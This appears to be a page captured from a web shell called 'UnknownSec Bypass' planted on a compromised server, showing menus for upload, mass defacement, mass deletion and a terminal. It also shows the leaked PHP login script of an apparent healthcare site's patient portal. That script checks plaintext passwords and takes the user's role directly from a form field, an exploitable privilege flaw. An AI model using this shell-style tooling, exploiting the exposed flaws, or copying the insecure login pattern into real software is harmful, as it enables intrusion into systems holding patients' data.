UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
patient_authentification.php
<?php require_once "config.php"; session_start(); $mobileno = $_POST['mobileno']; $password= $_POST['psw']; $userrole = $_POST['userrole']; $sanitized_mobileno = mysqli_real_escape_string($conn, $mobileno); $sanitized_password = mysqli_real_escape_string($conn, $password); $sanitized_role = mysqli_real_escape_string($conn, $userrole); $data="0"; $msg="0"; $query = "select * from tokenregistertb where mobileno= '".$sanitized_mobileno."' and upassword='".$sanitized_password."' and isactive='1' and isdeleted='0'"; $result = mysqli_query($conn, $query); while($row = mysqli_fetch_array($result)) { $data="1"; $_SESSION['uname']= $row["uname"]; $_SESSION['mobileno']= $row["mobileno"]; $_SESSION['token']= $row["token"]; $_SESSION['userrole']= $sanitized_role; } //echo("35345345"); echo json_encode($data); ?>
Copyright © 2025 - UnknownSec